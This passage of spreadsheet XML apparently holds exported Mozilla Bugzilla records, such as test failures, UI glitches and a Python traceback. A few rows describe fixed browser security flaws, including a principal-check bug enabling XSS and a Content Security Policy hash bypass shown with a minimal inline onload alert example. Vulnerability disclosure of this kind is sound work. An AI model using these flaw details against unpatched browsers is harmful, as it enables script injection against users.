      <c r="A3084" t="n">
        <v>225081</v>
      </c>
      <c r="B3084" t="inlineStr">
        <is>
          <t>2003-11-08 10:43:59 -0800</t>
        </is>
      </c>
      <c r="C3084" t="inlineStr">
        <is>
          <t>Tests are failing due to checkin for bug 224913</t>
        </is>
      </c>
      <c r="D3084" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:37 -0800</t>
        </is>
      </c>
      <c r="E3084" t="n">
        <v>1</v>
      </c>
      <c r="F3084" t="n">
        <v>1</v>
      </c>
      <c r="G3084" t="n">
        <v>4</v>
      </c>
      <c r="H3084" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3084" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3084" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3084" t="inlineStr">
        <is>
          <t>2.17.5</t>
        </is>
      </c>
      <c r="L3084" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3084" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3084" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3084" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3084" t="inlineStr"/>
      <c r="Q3084" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3084" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3084" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3084" t="n">
        <v>1</v>
      </c>
      <c r="U3084" t="n">
        <v>0</v>
      </c>
      <c r="V3084" t="n">
        <v>4</v>
      </c>
      <c r="W3084" t="inlineStr">
        <is>
          <t>The tests are failing due to checkin for bug 223913. 
Gerv</t>
        </is>
      </c>
      <c r="X3084" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3085">
      <c r="A3085" t="n">
        <v>1035007</v>
      </c>
      <c r="B3085" t="inlineStr">
        <is>
          <t>2014-07-06 16:02:46 -0700</t>
        </is>
      </c>
      <c r="C3085" t="inlineStr">
        <is>
          <t>nsStandardURL::SetHost called net_ToLowerCase with a bogus pointer, #4</t>
        </is>
      </c>
      <c r="D3085" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:21 -0700</t>
        </is>
      </c>
      <c r="E3085" t="n">
        <v>1</v>
      </c>
      <c r="F3085" t="n">
        <v>1</v>
      </c>
      <c r="G3085" t="n">
        <v>3</v>
      </c>
      <c r="H3085" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3085" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3085" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3085" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3085" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3085" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3085" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3085" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3085" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q3085" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3085" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3085" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T3085" t="n">
        <v>1</v>
      </c>
      <c r="U3085" t="n">
        <v>0</v>
      </c>
      <c r="V3085" t="n">
        <v>21</v>
      </c>
      <c r="W3085" t="inlineStr">
        <is>
          <t>Created attachment 8451391
testcase</t>
        </is>
      </c>
      <c r="X3085" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3086">
      <c r="A3086" t="n">
        <v>1262457</v>
      </c>
      <c r="B3086" t="inlineStr">
        <is>
          <t>2016-04-06 07:54:31 -0700</t>
        </is>
      </c>
      <c r="C3086" t="inlineStr">
        <is>
          <t>the list of comment tags in the 'tags' menu isn't updated in real time</t>
        </is>
      </c>
      <c r="D3086" t="inlineStr">
        <is>
          <t>2019-10-15 15:58:40 -0700</t>
        </is>
      </c>
      <c r="E3086" t="n">
        <v>1</v>
      </c>
      <c r="F3086" t="n">
        <v>1</v>
      </c>
      <c r="G3086" t="n">
        <v>7</v>
      </c>
      <c r="H3086" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3086" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J3086" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K3086" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L3086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3086" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3086" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3086" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3086" t="inlineStr"/>
      <c r="Q3086" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3086" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3086" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3086" t="n">
        <v>1</v>
      </c>
      <c r="U3086" t="n">
        <v>0</v>
      </c>
      <c r="V3086" t="n">
        <v>4</v>
      </c>
      <c r="W3086" t="inlineStr">
        <is>
          <t>in the current ui, when a comment tag is added the menu with the list of tags is immediately updated.  this allows for immediate filtering by tag.
this instant update needs to be implemented in bug-modal.</t>
        </is>
      </c>
      <c r="X3086" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3087">
      <c r="A3087" t="n">
        <v>38464</v>
      </c>
      <c r="B3087" t="inlineStr">
        <is>
          <t>2000-05-07 12:20:10 -0700</t>
        </is>
      </c>
      <c r="C3087" t="inlineStr">
        <is>
          <t>enter_bug.cgi: colon in "Severity:" not part of link</t>
        </is>
      </c>
      <c r="D3087" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E3087" t="n">
        <v>1</v>
      </c>
      <c r="F3087" t="n">
        <v>1</v>
      </c>
      <c r="G3087" t="n">
        <v>4</v>
      </c>
      <c r="H3087" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3087" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3087" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3087" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3087" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3087" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N3087" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3087" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3087" t="inlineStr"/>
      <c r="Q3087" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3087" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S3087" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T3087" t="n">
        <v>1</v>
      </c>
      <c r="U3087" t="n">
        <v>0</v>
      </c>
      <c r="V3087" t="n">
        <v>9</v>
      </c>
      <c r="W3087" t="inlineStr">
        <is>
          <t>On enter_bug.cgi, some of the field names are hyperlinked to pages describing 
what the field is.  Most of the colons after the field names are hyperlinked 
along with the field name, but the colon after "Severity" isn't.</t>
        </is>
      </c>
      <c r="X3087" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3088">
      <c r="A3088" t="n">
        <v>1339377</v>
      </c>
      <c r="B3088" t="inlineStr">
        <is>
          <t>2017-02-14 02:31:01 -0800</t>
        </is>
      </c>
      <c r="C3088" t="inlineStr">
        <is>
          <t>[release-notifications] AttributeError: 'NoneType' object has no attribute 'encoding'</t>
        </is>
      </c>
      <c r="D3088" t="inlineStr">
        <is>
          <t>2017-03-13 06:34:50 -0700</t>
        </is>
      </c>
      <c r="E3088" t="n">
        <v>1</v>
      </c>
      <c r="F3088" t="n">
        <v>1</v>
      </c>
      <c r="G3088" t="n">
        <v>5</v>
      </c>
      <c r="H3088" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3088" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3088" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K3088" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3088" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3088" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3088" t="inlineStr">
        <is>
          <t>[lang=python]</t>
        </is>
      </c>
      <c r="Q3088" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3088" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3088" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3088" t="n">
        <v>1</v>
      </c>
      <c r="U3088" t="n">
        <v>0</v>
      </c>
      <c r="V3088" t="n">
        <v>10</v>
      </c>
      <c r="W3088" t="inlineStr">
        <is>
          <t>Since release-notifications sends logs to Pappertrail (bug 1334092), this error comes out quite often (several times per release).
It seems we just need a retry mechanism to fetch task definition. Here are the logs:
&gt; Feb 13 13:02:55 heroku-release-notifications app/worker.1: 2017-02-13 21:02:55,178 - pulsenotify.util - INFO - Fetching task Fn7RG6rTTfmvQe1XkV-3Ow from Taskcluster 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:56,996 - pulsenotify.plugins.irc - INFO - Notified with IRC for Task(id=Fn7RG6rTTfmvQe1XkV-3Ow, status=task-completed) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,006 - botocore.vendored.requests.packages.urllib3.connectionpool - INFO - Starting new HTTPS connection (1): mozilla-release-logs.s3.amazonaws.com 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,240 - pulsenotify.plugins.log_collect - INFO - log_collect: log for Task(id=Fn7RG6rTTfmvQe1XkV-3Ow, status=task-completed) uploaded to Amazon S3 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,252 - botocore.vendored.requests.packages.urllib3.connectionpool - INFO - Starting new HTTPS connection (1): email.us-west-2.amazonaws.com 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,706 - pulsenotify.plugins.ses - INFO - Notified with SES for Task(id=Fn7RG6rTTfmvQe1XkV-3Ow, status=task-completed) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,710 - pulsenotify.consumer - INFO - Acknowledging consumption of Task(id=Fn7RG6rTTfmvQe1XkV-3Ow, status=task-completed) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,711 - asyncio - ERROR - Task exception was never retrieved 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: future: &lt;Task finished coro=&lt;irc_notify() done, defined at /app/pulsenotify/plugins/irc.py:73&gt; exception=RuntimeError('Not connected',)&gt; 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: Traceback (most recent call last): 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:   File "uvloop/task.pyx", line 126, in uvloop.loop.BaseTask._fast_step (uvloop/loop.c:99441) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:   File "/app/pulsenotify/plugins/irc.py", line 76, in irc_notify 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:     self.irc_client.send('JOIN', channel=channel) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:   File "/app/.heroku/python/lib/python3.5/site-packages/bottom/client.py", line 41, in send 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:     raise RuntimeError("Not connected") 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: RuntimeError: Not connected 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,766 - asyncio - ERROR - Unhandled exception in event loop 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: Traceback (most recent call last): 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:   File "uvloop/handles/stream.pyx", line 786, in uvloop.loop.__uv_stream_on_read_impl (uvloop/loop.c:63166) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:   File "uvloop/handles/stream.pyx", line 560, in uvloop.loop.UVStream._on_read (uvloop/loop.c:60666) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:   File "/app/.heroku/python/lib/python3.5/asyncio/sslproto.py", line 505, in data_received 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:     self._app_protocol.data_received(chunk) 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:   File "/app/.heroku/python/lib/python3.5/site-packages/bottom/protocol.py", line 31, in data_received 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1:     message = line.decode(self.client.encoding, "ignore").strip() 
&gt; Feb 13 13:02:57 heroku-release-notifications app/worker.1: AttributeError: 'NoneType' object has no attribute 'encoding' 
&gt; Feb 13 13:02:58 heroku-release-notifications app/worker.1: 2017-02-13 21:02:57,786 - pulsenotify.util - INFO - Fetching task ldWiUF-xQgqNStsOzWs5UA from Taskcluster 
&gt; Feb 13 13:03:01 heroku-release-notifications app/worker.1: 2017-02-13 21:03:01,596 - pulsenotify.plugins.irc - INFO - Notified with IRC for Task(id=ldWiUF-xQgqNStsOzWs5UA, status=task-completed) 
&gt; Feb 13 13:03:01 heroku-release-notifications app/worker.1: 2017-02-13 21:03:01,625 - botocore.vendored.requests.packages.urllib3.connectionpool - INFO - Starting new HTTPS connection (1): mozilla-release-logs.s3.amazonaws.com 
&gt; Feb 13 13:03:01 heroku-release-notifications app/worker.1: 2017-02-13 21:03:01,679 - pulsenotify.plugins.log_collect - INFO - log_collect: log for Task(id=ldWiUF-xQgqNStsOzWs5UA, status=task-completed) uploaded to Amazon S3 
&gt; Feb 13 13:03:01 heroku-release-notifications app/worker.1: 2017-02-13 21:03:01,689 - botocore.vendored.requests.packages.urllib3.connectionpool - INFO - Starting new HTTPS connection (1): email.us-west-2.amazonaws.com 
&gt; Feb 13 13:03:02 heroku-release-notifications app/worker.1: 2017-02-13 21:03:02,140 - pulsenotify.plugins.ses - INFO - Notified with SES for Task(id=ldWiUF-xQgqNStsOzWs5UA, status=task-completed)</t>
        </is>
      </c>
      <c r="X3088" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3089">
      <c r="A3089" t="n">
        <v>793121</v>
      </c>
      <c r="B3089" t="inlineStr">
        <is>
          <t>2012-09-21 03:23:16 -0700</t>
        </is>
      </c>
      <c r="C3089" t="inlineStr">
        <is>
          <t>nsLocation::CheckURL can use the wrong principal</t>
        </is>
      </c>
      <c r="D3089" t="inlineStr">
        <is>
          <t>2013-01-10 21:34:07 -0800</t>
        </is>
      </c>
      <c r="E3089" t="n">
        <v>1</v>
      </c>
      <c r="F3089" t="n">
        <v>1</v>
      </c>
      <c r="G3089" t="n">
        <v>3</v>
      </c>
      <c r="H3089" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3089" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3089" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3089" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3089" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3089" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3089" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3089" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3089" t="inlineStr">
        <is>
          <t>fix in bug 801305</t>
        </is>
      </c>
      <c r="Q3089" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3089" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3089" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3089" t="n">
        <v>1</v>
      </c>
      <c r="U3089" t="n">
        <v>0</v>
      </c>
      <c r="V3089" t="n">
        <v>13</v>
      </c>
      <c r="W3089" t="inlineStr">
        <is>
          <t>This is a regression from bug 754202. (fx16,17,18 are affected.)
When a chrome code calls an untrusted function via CrossCompartmentWrapper/WaiveXrayWrapper, GetSubjectPrincipal returns a content principal, but GetPrincipalAndFrame returns the system principal.  nsLocation::CheckURL gets an owner principal by calling GetCxSubjectPrincipalAndFrame, which calls GetPrincipalAndFrame.  
By using this bug, content can perform an XSS attack, and if there is an extension that exposes a chrome window to content, content can run arbitrary code with chrome privileges.</t>
        </is>
      </c>
      <c r="X3089" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3090">
      <c r="A3090" t="n">
        <v>1644790</v>
      </c>
      <c r="B3090" t="inlineStr">
        <is>
          <t>2020-06-10 09:18:49 -0700</t>
        </is>
      </c>
      <c r="C3090" t="inlineStr">
        <is>
          <t>Firefox 63+ CSP Hashes Allow Inline Event Handler Script Execution without 'unsafe-hashes' specified</t>
        </is>
      </c>
      <c r="D3090" t="inlineStr">
        <is>
          <t>2024-05-30 10:15:37 -0700</t>
        </is>
      </c>
      <c r="E3090" t="n">
        <v>1</v>
      </c>
      <c r="F3090" t="n">
        <v>1</v>
      </c>
      <c r="G3090" t="n">
        <v>3</v>
      </c>
      <c r="H3090" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3090" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3090" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3090" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3090" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3090" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3090" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3090" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3090" t="inlineStr">
        <is>
          <t>[domsecurity-backlog][reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main108+]</t>
        </is>
      </c>
      <c r="Q3090" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3090" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3090" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T3090" t="n">
        <v>1</v>
      </c>
      <c r="U3090" t="n">
        <v>0</v>
      </c>
      <c r="V3090" t="n">
        <v>15</v>
      </c>
      <c r="W3090" t="inlineStr">
        <is>
          <t>According to the CSP Level 2 Specification "If 'unsafe-inline' is not in the list" ... "Whenever the user agent would execute an inline script from an inline event handler, instead the user agent MUST NOT execute script, and MUST report a violation." https://www.w3.org/TR/CSP2/#allowed-script-sources however FireFox 62 and below followed the spec, but starting with FireFox 63 it ignores this restriction.  
The change in the code that allowed this appears to be here:
https://searchfox.org/mozilla-central/diff/5fff1762ada26b04519cf8ed24489ca1b0f73c2f/dom/security/nsCSPContext.cpp#551-566
Given a CSP policy: default-src 'none';script-src 'sha256-vmevK1pwVutIOH96hxUOXymyXdR2hSlZRAu8QWiW3dw='; and the markup: &lt;body onload="alert('attr');"&gt; the hash matches: "alert('attr');"  it will allow execution of the script. You can see an example of this in the test page: https://www.petefreitag.com/test/csp-hash-bug.html
Again, according to the CSP Level 2 spec it should only allow a valid hash or a valid nonce on "a script element". So, it should only allow it in the form:  &lt;script&gt;alert('attr');&lt;/script&gt;  not in an inline event handler.
The CSP Level 3 spec added a CSP source list keyword 'unsafe-hashes' which provides a way to allow execution of inline script event handlers. A bug is already filed to track implementation of unsafe-hashes: https://bugzilla.mozilla.org/show_bug.cgi?id=1343950  
It appears that the best way to fix this security issue would be to implement 'unsafe-hashes'. Anyone attempting to use a hash on an inline script event handler would find that it fails to execute in Chrome without adding 'unsafe-hashes', so I would not imagine any legitimate use cases would rely on the current behavior.</t>
        </is>
      </c>
      <c r="X3090" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3091">
      <c r="A3091" t="n">
        <v>1493999</v>
      </c>
      <c r="B3091" t="inlineStr">
        <is>
          <t>2018-09-25 08:12:39 -0700</t>
        </is>
      </c>
      <c r="C3091" t="inlineStr">
        <is>
          <t>Windows symbols missing since Microsoft's September patch day</t>
        </is>
      </c>
      <c r="D3091" t="inlineStr">
        <is>
          <t>2018-10-05 03:17:50 -0700</t>
        </is>
      </c>
      <c r="E3091" t="n">
        <v>1</v>
      </c>
      <c r="F3091" t="n">
        <v>1</v>
      </c>
      <c r="G3091" t="n">
        <v>4</v>
      </c>
      <c r="H3091" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3091" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3091" t="inlineStr">
        <is>
          <t>Symbols</t>
        </is>
      </c>
      <c r="K3091" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3091" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3091" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N3091" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3091" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3091" t="inlineStr"/>
      <c r="Q3091" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3091" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3091" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3091" t="n">
        <v>1</v>
      </c>
      <c r="U3091" t="n">
        <v>0</v>
      </c>
      <c r="V3091" t="n">
        <v>3</v>
      </c>
      <c r="W3091" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1486825 +++
the latest report of missing signatures is highlighting a number of windows system dll symbols across various versions of the os:
Name 	Version 	Debug ID 	# of crash reports
ntdll.dll	10.0.17134.254	5BADA6763A2DF568BAEAC8F70DA0DF3C1	47469
ucrtbase.dll	10.0.17134.254	1C53BB2C2F5D54A655C8CEE1F4CCBD4B1	47348
ntdll.dll	6.1.7601.24231	B83325CB67964070AB709DD5B4AA70C31	16691
KERNELBASE.dll	6.1.7601.24231	A32B095FBEA047809684FAD7061BEA562	16685
kernel32.dll	6.1.7601.24231	688985C0502946FC8D8EE2E41F8B31AC2	16676
ntdll.dll	6.1.7601.24231	BD14E8F854B944CABFED8201BE5AE40A2	14165
ucrtbase.dll	10.0.17134.254	08A2EF04ED46F71846F69333018A073A1	12132
ntdll.dll	10.0.17134.254	D3AE91CEDD9309EF777F2FD5120010BE1	8911
ntdll.dll	6.1.7601.24231	8D861C26D6FA45B3BD8751D088E9648C2	8812
kernel32.dll	6.1.7601.24231	716DC733953C48A59A00087BD2EB59F42	8798
ntdll.dll	10.0.17134.254	ACBCC16F0B619A1EF190C1255641393B1	5153
the problem is apparent since the latest ms patchday in september and it's mainly affecting the proper signature generation for shutdownhangs.</t>
        </is>
      </c>
      <c r="X3091" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3092">
      <c r="A3092" t="n">
        <v>1421843</v>
      </c>
      <c r="B3092" t="inlineStr">
        <is>
          <t>2017-11-29 16:18:21 -0800</t>
        </is>
      </c>
      <c r="C3092" t="inlineStr">
        <is>
          <t>investigate using Webpack 3 "scope hoisting" for faster JS loading</t>
        </is>
      </c>
      <c r="D3092" t="inlineStr">
        <is>
          <t>2019-06-28 14:29:46 -0700</t>
        </is>
      </c>
      <c r="E3092" t="n">
        <v>1</v>
      </c>
      <c r="F3092" t="n">
        <v>1</v>
      </c>
      <c r="G3092" t="n">
        <v>2</v>
      </c>
      <c r="H3092" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3092" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3092" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K3092" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3092" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3092" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3092" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3092" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3092" t="inlineStr"/>
      <c r="Q3092" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3092" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3092" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T3092" t="n">
        <v>1</v>
      </c>
      <c r="U3092" t="n">
        <v>0</v>
      </c>
      <c r="V3092" t="n">
        <v>9</v>
      </c>
      <c r="W3092" t="inlineStr">
        <is>
          <t>Now that we've updated to Webpack 3, scope-hoisting looks like, on the surface, that it's likely to be an easy perf win for JS loading time.  So we should give it a try...</t>
        </is>
      </c>
      <c r="X3092" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3093">
      <c r="A3093" t="n">
        <v>1374474</v>
      </c>
      <c r="B3093" t="inlineStr">
        <is>
          <t>2017-06-19 16:58:49 -0700</t>
        </is>
      </c>
      <c r="C3093" t="inlineStr">
        <is>
          <t>back button in 55 beta does not have greyed out disabled appearance in default theme</t>
        </is>
      </c>
      <c r="D3093" t="inlineStr">
        <is>
          <t>2017-08-09 07:54:44 -0700</t>
        </is>
      </c>
      <c r="E3093" t="n">
        <v>1</v>
      </c>
      <c r="F3093" t="n">
        <v>1</v>
      </c>
      <c r="G3093" t="n">
        <v>2</v>
      </c>
      <c r="H3093" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3093" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3093" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K3093" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L3093" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3093" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3093" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3093" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3093" t="inlineStr">
        <is>
          <t>[photon-visual]</t>
        </is>
      </c>
      <c r="Q3093" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3093" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3093" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T3093" t="n">
        <v>1</v>
      </c>
      <c r="U3093" t="n">
        <v>0</v>
      </c>
      <c r="V3093" t="n">
        <v>18</v>
      </c>
      <c r="W3093" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Build ID: 20170615063752
Steps to reproduce:
1. Use the default theme in 55 beta
2. Navigate to the first page in a tab's session history (or just open a new window or tab)
Actual results:
The back button appearance is not greyed out.
Expected results:
The back button should be greyed out.</t>
        </is>
      </c>
      <c r="X3093" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3094">
      <c r="A3094" t="n">
        <v>665934</v>
      </c>
      <c r="B3094" t="inlineStr">
        <is>
          <t>2011-06-21 09:47:06 -0700</t>
        </is>
      </c>
      <c r="C3094" t="inlineStr">
        <is>
          <t>GrowAtomTable() return code not checked, crash due to ANGLE</t>
        </is>
      </c>
      <c r="D3094" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:01 -0700</t>
        </is>
      </c>
      <c r="E3094" t="n">
        <v>1</v>
      </c>
      <c r="F3094" t="n">
        <v>1</v>
      </c>
      <c r="G3094" t="n">
        <v>3</v>
      </c>
      <c r="H3094" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3094" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
